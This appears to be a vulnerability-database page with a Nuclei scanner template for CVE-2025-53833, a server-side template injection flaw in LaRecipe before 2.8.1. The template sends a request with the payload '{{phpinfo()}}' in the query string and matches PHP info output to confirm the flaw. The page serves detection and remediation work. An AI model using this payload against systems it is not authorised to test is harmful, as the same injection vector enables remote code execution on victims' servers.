LaRecipe < 2.8.1 Remote Code Execution via SSTI
CVE-2025-53833
Verified
Description
LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations.
Severity
Critical
CVSS Score
10
Exploit Probability
9%
Affected Product
larecipe
Published Date
July 15, 2025
Template Author
iamnoooob, pdresearch
CVE-2025-53833.yaml
id: CVE-2025-53833
info:
name: LaRecipe < 2.8.1 Remote Code Execution via SSTI
author: iamnoooob,pdresearch
severity: critical
description: |
LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations.
impact: |
Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration.
remediation: |
Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch.
reference:
- https://github.com/saleem-hadad/larecipe/security/advisories/GHSA-jv7x-xhv2-p5v2
- https://github.com/advisories/GHSA-jv7x-xhv2-p5v2
- https://nvd.nist.gov/vuln/detail/CVE-2025-53833
classification:
epss-score: 0.09357
epss-percentile: 0.9484
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-53833
cwe-id: CWE-1336
cpe: cpe:2.3:a:binarytorch:larecipe:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: binarytorch
product: larecipe
fofa-query: body="/binarytorch/larecipe/"
tags: cve,cve2025,larecipe,rce,ssti,oss,vkev,vuln
http:
- raw:
- |
GET /docs/1.0/?{{phpinfo()}} HTTP/1.1
Host: {{Hostname}}
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
- "larecipe"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b9951b5e3aefe09d9107842b4d564fb77e29feede76c76c379b7244afd481eaf022100ac35242fef379784e73670474a3379ace911a3124b70938260fd9b38043062b0:922c64590222798bb761d5b6d8e7295010.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-53833
CWE ID:
cwe-1336
Remediation Steps
Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch.